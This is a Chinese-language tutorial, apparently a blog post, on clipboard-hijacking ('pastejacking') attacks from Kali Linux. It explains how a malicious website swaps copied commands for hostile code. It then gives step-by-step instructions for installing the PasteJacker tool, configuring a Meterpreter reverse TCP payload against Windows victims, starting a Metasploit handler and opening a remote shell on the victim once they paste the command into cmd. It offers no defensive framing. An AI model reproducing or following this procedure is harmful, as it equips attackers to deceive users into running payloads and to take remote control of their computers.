kali linux 通过粘贴板攻击对方服务器

一、粘贴板中毒攻击原理

该工具的主要目的是自动化攻击，将此攻击中使用的所有已知技巧收集在一个地方和一项自动化工作，因为在搜索后发现没有工具可以正确地完成这项工作方式现在因为这种攻击取决于用户将粘贴什么，将 Metasploit 网络交付模块的想法实现到工具中，所以当用户粘贴到终端时，你会在他的设备上获得 meterpreter 会话。

换句话说，当我们在自己电脑上的一个网站上复制一条看似正常的命令时，但事实上那个网站在背后偷偷的篡改了我们粘贴的内容，我以为我复制了一条正常的命令，但事实上我复制到粘贴板上的命令，却是一串恶意代码，这就是恶意的网站搭建者，他欺骗我们最终用户访问他的恶意网站，然后通过我们在他网站上的键盘和鼠标操作，将恶意的内容注入到我们本地的剪贴板当中，这种攻击方式，我们就成为粘贴劫持攻击。

二、Pastejacker 攻击工具简介

模拟剪贴板劫持对目标进行攻击。

https://github.com/D4Vinci/PasteJacker

简而言之，粘贴劫持是恶意网站用来控制您计算机的剪贴板并在您不知情的情况下将其内容更改为有害内容的一种方法。

所以在这里所做的是自动化原始攻击并添加另外两个技巧来欺骗用户，使用 HTML 和 CSS将讨论它然后添加 meterpreter 会话

三、安装Pastejacker

安装 Pastejacker 工具

git clone https://github.com/D4Vinci/PasteJacker.git

注意Kali Linux 默认安装了 Python 2.x 和 Python 3.x 版本，可以按照以下步骤在 Kali 中切换到 Python 3：

sudo update-alternatives --install /usr/bin/python python /usr/bin/python2*
sudo update-alternatives --install /usr/bin/python python /usr/bin/python3*
这将把 /usr/bin/python 链接到 Python 2.7 和 Python 3 之间进行切换。您可以使用以下命令来切换到 Python 3：

sudo update-alternatives --config python

安装pip

wget https://bootstrap.pypa.io/get-pip.py

python3 get-pip.py

安装PasteJacker

python3 -m pip install ./PasteJacker

四、Pastejacker结合MSF拿到目标shell权限

进入Pastejacker安装路径：

cd /usr/local/lib/python3.9/dist-packages/PasteJacker/Core

vim updater.py

按i进入编辑模式把选中的内容按D删除。按ESC-- ：wq保存退出

运行工具：pastejacker

选择：1（Windows）

选择：1

选择：1-- TCP协议的后渗透模块

然后输入本地IP

端口自己设定或者默认回车就可以了

选择：2；服务端口默认80回车

输入一些文字内容访问攻击者IP时候会出现浏览器页面上

这时候服务已开启……

新建一个终端进入pastejacker文件夹

cd .pastejacker/

利用MSF启动pastejacker 设置好的文件包（msf_handler.rc），该文件是在 pastejacker 程序设置而保存下来的操作，直接使用该文件即可，不需要去手动设置

msfconsole -r msf_handler.rc

到Windows受害者端访问kali攻击者的IP地址

复制内容粘贴到cmd命令窗口

查看目标列表

sessions

选中列表中的第一个，如果有多个粘贴运行了剪贴板可在列表中选其中一个进行后渗透

sessions -i 1

shell  //获取shell
chcp 65001  //解决乱码